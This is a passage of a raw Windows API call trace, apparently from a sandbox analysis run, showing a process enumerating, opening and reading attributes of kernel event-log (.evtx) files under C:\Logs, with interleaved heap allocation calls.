| out: lpNewFilePointer=0x0) returned 1 [0086.780] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.780] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.780] CloseHandle (hObject=0x348) returned 1 [0086.780] AreFileApisANSI () returned 1 [0086.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0086.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0086.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 56 [0086.780] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.780] GetFileType (hFile=0x348) returned 0x1 [0086.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0086.781] CloseHandle (hObject=0x348) returned 1 [0086.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0086.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0086.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0086.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0086.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0086.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0086.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0086.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0086.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0086.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0086.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0086.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0086.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0086.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0086.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0086.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0086.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0086.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0086.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0086.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0086.782] AreFileApisANSI () returned 1 [0086.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0086.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0086.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 56 [0086.782] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x506ad1ac, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x506ad1ac, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0086.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0086.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0086.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0086.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.782] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ca2fbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ca2fbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", cAlternateFileName="MIA934~1.EVT")) returned 1 [0086.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0086.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0086.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0086.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0086.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0086.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0086.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0086.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0086.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0086.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0086.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0086.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0086.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0086.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0086.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0086.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0086.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0086.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0086.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0086.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0086.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.783] AreFileApisANSI () returned 1 [0086.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", lpUsedDefaultChar=0x0) returned 58 [0086.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0086.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.783] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0086.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0086.783] AreFileApisANSI () returned 1 [0086.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0086.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69db0 [0086.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 58 [0086.784] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.784] GetFileType (hFile=0x348) returned 0x1 [0086.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0086.784] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.784] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.784] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.784] CloseHandle (hObject=0x348) returned 1 [0086.785] AreFileApisANSI () returned 1 [0086.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0086.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0086.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 58 [0086.785] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.785] GetFileType (hFile=0x348) returned 0x1 [0086.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0086.785] CloseHandle (hObject=0x348) returned 1 [0086.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0086.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0086.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0086.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0086.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0086.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0086.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0086.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0086.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0086.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.786] AreFileApisANSI () returned 1 [0086.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0086.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a9b0 [0086.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 58 [0086.786] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ca2fbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ca2fbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0086.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0086.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0086.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0086.786] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.786] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.786] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5071f8b0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5071f8b0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Kernel-PnP%4Configuration.evtx", cAlternateFileName="MIB32D~1.EVT")) returned 1 [0086.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0086.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0086.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0086.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68ef0 [0086.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0086.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0086.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68ef0 | out: hHeap=0x20000) returned 1 [0086.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0086.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0086.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0086.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0086.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0086.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0086.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0086.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0086.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0086.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0086.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0086.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0086.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0086.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0086.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.787] AreFileApisANSI () returned 1 [0086.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx", lpUsedDefaultChar=0x0) returned 57 [0086.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0086.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.787] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0086.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0086.787] AreFileApisANSI () returned 1 [0086.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0086.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0086.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 57 [0086.788] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.788] GetFileType (hFile=0x348) returned 0x1 [0086.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0086.788] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.788] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.788] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.788] CloseHandle (hObject=0x348) returned 1 [0086.789] AreFileApisANSI () returned 1 [0086.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0086.789] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0086.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned 57 [0086.789] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.789] GetFileType (hFile=0x348) returned 0x1 [0086.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 